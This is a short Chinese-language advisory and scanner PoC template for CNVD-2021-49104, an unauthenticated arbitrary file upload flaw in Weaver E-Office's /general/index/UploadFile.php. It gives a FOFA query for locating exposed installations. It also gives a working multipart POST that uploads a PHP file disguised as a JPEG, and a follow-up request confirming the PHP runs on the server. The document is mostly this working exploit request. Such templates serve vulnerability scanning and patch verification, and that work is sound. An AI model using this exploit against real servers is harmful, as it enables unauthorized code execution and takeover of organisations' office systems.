漏洞描述
在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限
fofa: app="泛微-协同办公OA" || app="Weaver-OA"
CNVD-2021-49104: 泛微OA E-Office UploadFile.php 任意文件上传漏洞
PoC代码[已公开]
id: CNVD-2021-49104
info:
name: 泛微OA E-Office UploadFile.php 任意文件上传漏洞
author: zan8in
severity: critical
description: |-
在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限
fofa: app="泛微-协同办公OA" || app="Weaver-OA"
reference:
- https://www.cnvd.org.cn/patchInfo/show/270651
tags: cnvd,cnvd2021,unauth,upload,general
created: 2021/10/23
set:
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"Filedata\"; filename=\"cmd.php\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
<?php phpinfo();?>\r\n\
\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200
r1:
request:
method: GET
path: /images/logo/logo-eoffice.php
expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version')
expression: r0() && r1()